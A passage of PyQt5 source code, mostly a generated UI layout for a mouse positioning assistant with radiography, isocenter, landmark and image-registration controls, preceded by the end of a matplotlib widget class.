QtGui.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
class matplotlibWidgetSmall(QWid):
"""
The matplotlibWidget class based on QWidget
"""
def __init__(self, parent=None):
QWid.__init__(self, parent)
# save canvas and toolbar
self.canvas = MplCanvas()
self.toolbar = NavigationToolbar(self.canvas, self)
# set layout and add them to widget
self.vbl = QtGui.QVBoxLayout()
self.vbl.addWidget(self.toolbar)
self.vbl.addWidget(self.canvas)
self.setLayout(self.vbl)
```
#### File: Backend/UI/Positioning_Assistant_GUI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Mouse_Positioning_Interface(object):
def setupUi(self, Mouse_Positioning_Interface):
Mouse_Positioning_Interface.setObjectName("Mouse_Positioning_Interface")
Mouse_Positioning_Interface.setEnabled(True)
Mouse_Positioning_Interface.resize(1708, 916)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Mouse_Positioning_Interface.sizePolicy().hasHeightForWidth())
Mouse_Positioning_Interface.setSizePolicy(sizePolicy)
Mouse_Positioning_Interface.setMinimumSize(QtCore.QSize(1708, 916))
Mouse_Positioning_Interface.setMaximumSize(QtCore.QSize(16777215, 16777215))
Mouse_Positioning_Interface.setAutoFillBackground(False)
Mouse_Positioning_Interface.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(Mouse_Positioning_Interface)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_50 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_50.setObjectName("gridLayout_50")
self.splitter_4 = QtWidgets.QSplitter(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.splitter_4.sizePolicy().hasHeightForWidth())
self.splitter_4.setSizePolicy(sizePolicy)
self.splitter_4.setOrientation(QtCore.Qt.Vertical)
self.splitter_4.setObjectName("splitter_4")
self.Logo = QtWidgets.QLabel(self.splitter_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Logo.sizePolicy().hasHeightForWidth())
self.Logo.setSizePolicy(sizePolicy)
self.Logo.setMaximumSize(QtCore.QSize(16777215, 300))
self.Logo.setText("")
self.Logo.setPixmap(QtGui.QPixmap(":/Imgs/Icons/Pic.jpg"))
self.Logo.setScaledContents(True)
self.Logo.setObjectName("Logo")
self.groupBox = QtWidgets.QGroupBox(self.splitter_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
self.groupBox.setSizePolicy(sizePolicy)
self.groupBox.setMinimumSize(QtCore.QSize(200, 300))
self.groupBox.setObjectName("groupBox")
self.gridLayout_14 = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout_14.setObjectName("gridLayout_14")
self.LogBox = QtWidgets.QVBoxLayout()
self.LogBox.setObjectName("LogBox")
self.gridLayout_14.addLayout(self.LogBox, 0, 0, 1, 1)
self.gridLayout_50.addWidget(self.splitter_4, 0, 1, 2, 1)
self.GroupCoordinates = QtWidgets.QGroupBox(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.GroupCoordinates.sizePolicy().hasHeightForWidth())
self.GroupCoordinates.setSizePolicy(sizePolicy)
self.GroupCoordinates.setMinimumSize(QtCore.QSize(0, 100))
self.GroupCoordinates.setMaximumSize(QtCore.QSize(16777215, 200))
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.GroupCoordinates.setFont(font)
self.GroupCoordinates.setObjectName("GroupCoordinates")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.GroupCoordinates)
self.horizontalLayout.setObjectName("horizontalLayout")
self.SS_IsoCenter = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_IsoCenter.setMinimumSize(QtCore.QSize(0, 20))
self.SS_IsoCenter.setAutoFillBackground(False)
self.SS_IsoCenter.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_IsoCenter.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_IsoCenter.setObjectName("SS_IsoCenter")
self.gridLayout_43 = QtWidgets.QGridLayout(self.SS_IsoCenter)
self.gridLayout_43.setObjectName("gridLayout_43")
self.SS_IC_Label = QtWidgets.QLabel(self.SS_IsoCenter)
self.SS_IC_Label.setAlignment(QtCore.Qt.AlignCenter)
self.SS_IC_Label.setObjectName("SS_IC_Label")
self.gridLayout_43.addWidget(self.SS_IC_Label, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_IsoCenter)
self.label_7 = QtWidgets.QLabel(self.GroupCoordinates)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_7.sizePolicy().hasHeightForWidth())
self.label_7.setSizePolicy(sizePolicy)
self.label_7.setText("")
self.label_7.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_7.setScaledContents(True)
self.label_7.setObjectName("label_7")
self.horizontalLayout.addWidget(self.label_7)
self.SS_PlanImage = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_PlanImage.setMinimumSize(QtCore.QSize(0, 20))
self.SS_PlanImage.setAutoFillBackground(False)
self.SS_PlanImage.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_PlanImage.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_PlanImage.setObjectName("SS_PlanImage")
self.gridLayout_44 = QtWidgets.QGridLayout(self.SS_PlanImage)
self.gridLayout_44.setObjectName("gridLayout_44")
self.SS_Plan_Box_2 = QtWidgets.QLabel(self.SS_PlanImage)
self.SS_Plan_Box_2.setAlignment(QtCore.Qt.AlignCenter)
self.SS_Plan_Box_2.setObjectName("SS_Plan_Box_2")
self.gridLayout_44.addWidget(self.SS_Plan_Box_2, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_PlanImage)
self.label_8 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_8.setText("")
self.label_8.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_8.setScaledContents(True)
self.label_8.setObjectName("label_8")
self.horizontalLayout.addWidget(self.label_8)
self.SS_TreatImage = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_TreatImage.setMinimumSize(QtCore.QSize(0, 20))
self.SS_TreatImage.setAutoFillBackground(False)
self.SS_TreatImage.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_TreatImage.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_TreatImage.setObjectName("SS_TreatImage")
self.gridLayout_47 = QtWidgets.QGridLayout(self.SS_TreatImage)
self.gridLayout_47.setObjectName("gridLayout_47")
self.LabelCOM_4 = QtWidgets.QLabel(self.SS_TreatImage)
self.LabelCOM_4.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_4.setObjectName("LabelCOM_4")
self.gridLayout_47.addWidget(self.LabelCOM_4, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_TreatImage)
self.label_11 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_11.setText("")
self.label_11.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_11.setScaledContents(True)
self.label_11.setObjectName("label_11")
self.horizontalLayout.addWidget(self.label_11)
self.SS_RegApproved = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_RegApproved.setMinimumSize(QtCore.QSize(0, 20))
self.SS_RegApproved.setAutoFillBackground(False)
self.SS_RegApproved.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_RegApproved.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_RegApproved.setObjectName("SS_RegApproved")
self.gridLayout_49 = QtWidgets.QGridLayout(self.SS_RegApproved)
self.gridLayout_49.setObjectName("gridLayout_49")
self.LabelCOM_5 = QtWidgets.QLabel(self.SS_RegApproved)
self.LabelCOM_5.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_5.setObjectName("LabelCOM_5")
self.gridLayout_49.addWidget(self.LabelCOM_5, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_RegApproved)
self.label_12 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_12.setText("")
self.label_12.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_12.setScaledContents(True)
self.label_12.setObjectName("label_12")
self.horizontalLayout.addWidget(self.label_12)
self.SS_StageSet = QtWidgets.QFrame(self.GroupCoordinates)
self.SS_StageSet.setMinimumSize(QtCore.QSize(0, 20))
self.SS_StageSet.setAutoFillBackground(False)
self.SS_StageSet.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.SS_StageSet.setFrameShadow(QtWidgets.QFrame.Sunken)
self.SS_StageSet.setObjectName("SS_StageSet")
self.gridLayout_52 = QtWidgets.QGridLayout(self.SS_StageSet)
self.gridLayout_52.setObjectName("gridLayout_52")
self.LabelCOM_6 = QtWidgets.QLabel(self.SS_StageSet)
self.LabelCOM_6.setAlignment(QtCore.Qt.AlignCenter)
self.LabelCOM_6.setObjectName("LabelCOM_6")
self.gridLayout_52.addWidget(self.LabelCOM_6, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.SS_StageSet)
self.label_16 = QtWidgets.QLabel(self.GroupCoordinates)
self.label_16.setText("")
self.label_16.setPixmap(QtGui.QPixmap(":/Arrows/Icons/move_right.png"))
self.label_16.setScaledContents(True)
self.label_16.setObjectName("label_16")
self.horizontalLayout.addWidget(self.label_16)
self.Button_create_report = QtWidgets.QPushButton(self.GroupCoordinates)
self.Button_create_report.setMaximumSize(QtCore.QSize(16777215, 500))
self.Button_create_report.setObjectName("Button_create_report")
self.horizontalLayout.addWidget(self.Button_create_report)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.gridLayout_50.addWidget(self.GroupCoordinates, 1, 0, 1, 1)
self.Registration = QtWidgets.QTabWidget(self.centralwidget)
self.Registration.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Registration.sizePolicy().hasHeightForWidth())
self.Registration.setSizePolicy(sizePolicy)
self.Registration.setObjectName("Registration")
self.TabRadiography = QtWidgets.QWidget()
self.TabRadiography.setObjectName("TabRadiography")
self.gridLayout_15 = QtWidgets.QGridLayout(self.TabRadiography)
self.gridLayout_15.setObjectName("gridLayout_15")
self.Group_IsoCenter = QtWidgets.QGroupBox(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Group_IsoCenter.sizePolicy().hasHeightForWidth())
self.Group_IsoCenter.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
self.Group_IsoCenter.setFont(font)
self.Group_IsoCenter.setObjectName("Group_IsoCenter")
self.gridLayout_5 = QtWidgets.QGridLayout(self.Group_IsoCenter)
self.gridLayout_5.setObjectName("gridLayout_5")
self.label_5 = QtWidgets.QLabel(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_5.setFont(font)
self.label_5.setObjectName("label_5")
self.gridLayout_5.addWidget(self.label_5, 2, 0, 1, 1)
self.Button_Radiograph_toggleIso = QtWidgets.QPushButton(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
self.Button_Radiograph_toggleIso.setFont(font)
self.Button_Radiograph_toggleIso.setObjectName("Button_Radiograph_toggleIso")
self.gridLayout_5.addWidget(self.Button_Radiograph_toggleIso, 0, 2, 1, 2)
self.Text_RG_Filename_IsoCenter = QtWidgets.QTextEdit(self.Group_IsoCenter)
self.Text_RG_Filename_IsoCenter.setMaximumSize(QtCore.QSize(16777215, 60))
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(False)
font.setWeight(50)
self.Text_RG_Filename_IsoCenter.setFont(font)
self.Text_RG_Filename_IsoCenter.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.Text_RG_Filename_IsoCenter.setObjectName("Text_RG_Filename_IsoCenter")
self.gridLayout_5.addWidget(self.Text_RG_Filename_IsoCenter, 1, 0, 1, 4)
self.label_6 = QtWidgets.QLabel(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.gridLayout_5.addWidget(self.label_6, 2, 2, 1, 1)
self.Button_RG_defineIsoCenter = QtWidgets.QPushButton(self.Group_IsoCenter)
font = QtGui.QFont()
font.setPointSize(10)
self.Button_RG_defineIsoCenter.setFont(font)
self.Button_RG_defineIsoCenter.setObjectName("Button_RG_defineIsoCenter")
self.gridLayout_5.addWidget(self.Button_RG_defineIsoCenter, 0, 0, 1, 2)
self.SpotTxt_x = QtWidgets.QLineEdit(self.Group_IsoCenter)
self.SpotTxt_x.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.SpotTxt_x.setFont(font)
self.SpotTxt_x.setReadOnly(True)
self.SpotTxt_x.setObjectName("SpotTxt_x")
self.gridLayout_5.addWidget(self.SpotTxt_x, 2, 1, 1, 1)
self.SpotTxt_y = QtWidgets.QLineEdit(self.Group_IsoCenter)
self.SpotTxt_y.setEnabled(False)
font = QtGui.QFont()
font.setPointSize(10)
self.SpotTxt_y.setFont(font)
self.SpotTxt_y.setReadOnly(True)
self.SpotTxt_y.setObjectName("SpotTxt_y")
self.gridLayout_5.addWidget(self.SpotTxt_y, 2, 3, 1, 1)
self.gridLayout_15.addWidget(self.Group_IsoCenter, 1, 0, 1, 1)
self.Display_Radiography = matplotlibWidget(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Radiography.sizePolicy().hasHeightForWidth())
self.Display_Radiography.setSizePolicy(sizePolicy)
self.Display_Radiography.setMinimumSize(QtCore.QSize(200, 200))
self.Display_Radiography.setObjectName("Display_Radiography")
self.gridLayout_15.addWidget(self.Display_Radiography, 0, 1, 1, 1)
self.Display_Isocenter = matplotlibWidget(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Isocenter.sizePolicy().hasHeightForWidth())
self.Display_Isocenter.setSizePolicy(sizePolicy)
self.Display_Isocenter.setMinimumSize(QtCore.QSize(200, 200))
self.Display_Isocenter.setObjectName("Display_Isocenter")
self.gridLayout_15.addWidget(self.Display_Isocenter, 0, 0, 1, 1)
self.groupBox_3 = QtWidgets.QGroupBox(self.TabRadiography)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_3.sizePolicy().hasHeightForWidth())
self.groupBox_3.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setItalic(False)
font.setWeight(75)
self.groupBox_3.setFont(font)
self.groupBox_3.setObjectName("groupBox_3")
self.gridLayout_3 = QtWidgets.QGridLayout(self.groupBox_3)
self.gridLayout_3.setObjectName("gridLayout_3")
self.Button_RadiographyLM = QtWidgets.QPushButton(self.groupBox_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Button_RadiographyLM.sizePolicy().hasHeightForWidth())
self.Button_RadiographyLM.setSizePolicy(sizePolicy)
self.Button_RadiographyLM.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(9)
self.Button_RadiographyLM.setFont(font)
self.Button_RadiographyLM.setAutoFillBackground(False)
self.Button_RadiographyLM.setDefault(True)
self.Button_RadiographyLM.setObjectName("Button_RadiographyLM")
self.gridLayout_3.addWidget(self.Button_RadiographyLM, 0, 0, 1, 2)
self.Button_toggleLandmarksRG = QtWidgets.QPushButton(self.groupBox_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Button_toggleLandmarksRG.sizePolicy().hasHeightForWidth())
self.Button_toggleLandmarksRG.setSizePolicy(sizePolicy)
self.Button_toggleLandmarksRG.setMinimumSize(QtCore.QSize(0, 0))
font = QtGui.QFont()
font.setPointSize(9)
self.Button_toggleLandmarksRG.setFont(font)
self.Button_toggleLandmarksRG.setAutoFillBackground(False)
self.Button_toggleLandmarksRG.setDefault(True)
self.Button_toggleLandmarksRG.setObjectName("Button_toggleLandmarksRG")
self.gridLayout_3.addWidget(self.Button_toggleLandmarksRG, 0, 3, 1, 1)
self.Text_RG_Filename_Landmark = QtWidgets.QTextEdit(self.groupBox_3)
self.Text_RG_Filename_Landmark.setMaximumSize(QtCore.QSize(16777215, 60))
font = QtGui.QFont()
font.setPointSize(8)
font.setBold(False)
font.setWeight(50)
self.Text_RG_Filename_Landmark.setFont(font)
self.Text_RG_Filename_Landmark.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.Text_RG_Filename_Landmark.setObjectName("Text_RG_Filename_Landmark")
self.gridLayout_3.addWidget(self.Text_RG_Filename_Landmark, 1, 0, 1, 4)
self.label_24 = QtWidgets.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_24.setFont(font)
self.label_24.setObjectName("label_24")
self.gridLayout_3.addWidget(self.label_24, 2, 0, 1, 1)
self.TxtRGPinX = QtWidgets.QLineEdit(self.groupBox_3)
self.TxtRGPinX.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.TxtRGPinX.sizePolicy().hasHeightForWidth())
self.TxtRGPinX.setSizePolicy(sizePolicy)
self.TxtRGPinX.setMinimumSize(QtCore.QSize(50, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TxtRGPinX.setFont(font)
self.TxtRGPinX.setText("")
self.TxtRGPinX.setObjectName("TxtRGPinX")
self.gridLayout_3.addWidget(self.TxtRGPinX, 2, 1, 1, 1)
self.label_23 = QtWidgets.QLabel(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label_23.setFont(font)
self.label_23.setObjectName("label_23")
self.gridLayout_3.addWidget(self.label_23, 2, 2, 1, 1)
self.TxtRGPinY = QtWidgets.QLineEdit(self.groupBox_3)
self.TxtRGPinY.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.TxtRGPinY.sizePolicy().hasHeightForWidth())
self.TxtRGPinY.setSizePolicy(sizePolicy)
self.TxtRGPinY.setMinimumSize(QtCore.QSize(50, 0))
font = QtGui.QFont()
font.setPointSize(10)
self.TxtRGPinY.setFont(font)
self.TxtRGPinY.setText("")
self.TxtRGPinY.setObjectName("TxtRGPinY")
self.gridLayout_3.addWidget(self.TxtRGPinY, 2, 3, 1, 1)
self.gridLayout_15.addWidget(self.groupBox_3, 1, 1, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_15.addItem(spacerItem1, 0, 2, 1, 1)
self.Registration.addTab(self.TabRadiography, "")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.gridLayout_11 = QtWidgets.QGridLayout(self.tab)
self.gridLayout_11.setObjectName("gridLayout_11")
self.groupBox_20 = QtWidgets.QGroupBox(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_20.sizePolicy().hasHeightForWidth())
self.groupBox_20.setSizePolicy(sizePolicy)
self.groupBox_20.setObjectName("groupBox_20")
self.gridLayout_10 = QtWidgets.QGridLayout(self.groupBox_20)
self.gridLayout_10.setObjectName("gridLayout_10")
self.Button_RunReg = QtWidgets.QPushButton(self.groupBox_20)
self.Button_RunReg.setObjectName("Button_RunReg")
self.gridLayout_10.addWidget(self.Button_RunReg, 2, 0, 1, 1)
self.Slider_RegOverlay = QtWidgets.QSlider(self.groupBox_20)
self.Slider_RegOverlay.setMaximum(100)
self.Slider_RegOverlay.setSingleStep(0)
self.Slider_RegOverlay.setProperty("value", 50)
self.Slider_RegOverlay.setOrientation(QtCore.Qt.Horizontal)
self.Slider_RegOverlay.setObjectName("Slider_RegOverlay")
self.gridLayout_10.addWidget(self.Slider_RegOverlay, 1, 0, 1, 2)
self.Button_AccReg = QtWidgets.QPushButton(self.groupBox_20)
self.Button_AccReg.setObjectName("Button_AccReg")
self.gridLayout_10.addWidget(self.Button_AccReg, 2, 1, 1, 1)
self.Display_Fusion = matplotlibWidget(self.groupBox_20)
self.Display_Fusion.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.Display_Fusion.sizePolicy().hasHeightForWidth())
self.Display_Fusion.setSizePolicy(sizePolicy)
self.Display_Fusion.setMinimumSize(QtCore.QSize(300, 300))
self.Display_Fusion.setMaximumSize(QtCore.QSize(1000000, 1000000))
self.Display_Fusion.setObjectName("Display_Fusion")
self.gridLayout_10.addWidget(self.Display_Fusion, 0, 0, 1, 2)
self.gridLayout_11.addWidget(self.groupBox_20, 0, 2, 1, 1)
self.frame_4 = QtWidgets.QFrame(self.tab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.frame_4.sizePolicy().hasHeightForWidth())
self.frame_4.setSizePolicy(sizePolicy)
self.frame_4.setMinimumSize(QtCore.QSize(0, 200))
self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_4.setObjectName("frame_4")
self.gridLayout_4 = QtWidgets.QGridLayout(self.frame_4)
self.gridLayout_4.setObjectName("gridLayout_4")
self.groupBox_21 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_21.sizePolicy().hasHeightForWidth())
self.groupBox_21.setSizePolicy(sizePolicy)
self.groupBox_21.setMinimumSize(QtCore.QSize(250, 170))
self.groupBox_21.setObjectName("groupBox_21")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox_21)
self.gridLayout.setObjectName("gridLayout")
self.Button_default_moving = QtWidgets.QPushButton(self.groupBox_21)
self.Button_default_moving.setObjectName("Button_default_moving")
self.gridLayout.addWidget(self.Button_default_moving, 1, 0, 2, 2)
self.CoordsTable = QtWidgets.QTableWidget(self.groupBox_21)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.CoordsTable.sizePolicy().hasHeightForWidth())
self.CoordsTable.setSizePolicy(sizePolicy)
self.CoordsTable.setMinimumSize(QtCore.QSize(0, 20))
self.CoordsTable.setMaximumSize(QtCore.QSize(500, 150))
font = QtGui.QFont()
font.setPointSize(7)
self.CoordsTable.setFont(font)
self.CoordsTable.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
self.CoordsTable.setDragDropOverwriteMode(False)
self.CoordsTable.setObjectName("CoordsTable")
self.CoordsTable.setColumnCount(2)
self.CoordsTable.setRowCount(5)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setVerticalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(0, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(1, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(1, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(2, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(2, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(3, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(3, 1, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(4, 0, item)
item = QtWidgets.QTableWidgetItem()
self.CoordsTable.setItem(4, 1, item)
self.CoordsTable.horizontalHeader().setDefaultSectionSize(60)
self.CoordsTable.verticalHeader().setDefaultSectionSize(22)
self.gridLayout.addWidget(self.CoordsTable, 0, 0, 1, 2)
self.Button_default_fixed = QtWidgets.QPushButton(self.groupBox_21)
self.Button_default_fixed.setObjectName("Button_default_fixed")
self.gridLayout.addWidget(self.Button_default_fixed, 3, 0, 1, 2)
self.gridLayout_4.addWidget(self.groupBox_21, 0, 0, 3, 1)
self.groupBox_2 = QtWidgets.QGroupBox(self.frame_4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.groupBox_2.sizePolicy().hasHeightForWidth())
self.groupBox_2.setSizePolicy(sizePolicy)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 100))
self.groupBox_2.setObjectName("groupBox_2")
self.gridLayout_6 = QtWidgets.QGridLayout(self.groupBox_2)
self.gridLayout_6.setObjectName("gridLayout_6")
self.Slider_MarkerSize_Moving = QtWidgets.QSlider(self.groupBox_2)
self.Slider_MarkerSize_Moving.setOrientation(QtCore.Qt.Horizontal)
self.Slider_MarkerSize_Moving.setObjectName("Slider_MarkerSize_Moving")
self.gridLayout_6.addWidget(self.Slider_MarkerSize_Moving, 0, 1, 1, 1)
self.Slider_MarkerSize_Fixed = QtWidgets.QSlider(self.groupBox_2)
self.Slider_MarkerSize_Fixed.setOrientation(QtCore.Qt.Horizontal)
self.Slider_MarkerSize_Fixed.setObjectName("Slider_MarkerSize_Fixed")
self.gridLayout_6.addWidget(self.Slider_MarkerSize_Fixed, 1, 1, 1, 1)
self.label = QtWidgets.QLabel(self.groupBox_2)
self.label.setObjectName("label")
self.gridLayout_6.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtWidgets.QLabel(self.groupBox_2)
self.label_3.setObjectName("label_3")
self.gridLayout_6.addWidget(self.label_3, 1, 0, 1, 1)
self.gridLayout_4.addWidget(self.groupBox_2, 0, 2, 1, 1)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
